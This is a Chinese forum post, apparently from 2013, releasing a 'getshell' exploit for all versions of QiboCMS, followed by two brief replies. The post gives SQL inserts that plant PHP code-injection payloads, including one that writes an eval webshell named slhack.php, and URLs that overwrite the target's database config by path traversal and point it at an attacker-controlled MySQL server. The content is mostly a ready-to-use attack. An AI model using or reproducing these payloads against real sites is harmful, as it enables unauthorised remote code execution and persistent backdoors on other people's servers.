齐博cms 全版本getshell

admin · 发表于 2013-10-8 07:42:05

本地架设qibocms 安装好，然后进入mysql 开启外链，路由开启3306端口映射 ,然后mysql执行 insert into qb_jfabout(fid,title,content) values(1,'${@phpinfo()}','${@phpinfo()}');
这个只是测试phpinfo的我给出gestshell的exp
mysql执行 insert into qb_jfabout(fid,title,content) values(1,'${@$sl = @fopen("slhack.php", \'a\')}','${@@fwrite
($sl, \'<?php eval($_POST[slhack]) ?>\')}');
这样准备工作就OK了找到目标站点
http://xxx.com/do/fujsarticle.php?type=like&FileName=../data/mysql_config.php&submit=fuck ;覆盖mysql配置文件
http://xxx.com/do/jf.php?dbuser=数据库账号&dbhost=数据库ip&dbpw=数据库密码&dbname=数据库名&pre=数据库前缀默认是qb_&dbCHARSET=utf8&submit=getshell
这个数据库账号那些是自己本地的远程执行哦~
成功后会在do目录创建slhack.php密码为slhack的一句话
放出视频一枚
http://url.cn/Mz9S3Y

显示全部楼层 · 发表于 2013-10-8 07:46:26

俺是专业顶贴滴~~~

显示全部楼层 · 发表于 2013-10-8 08:48:14

路过，学习下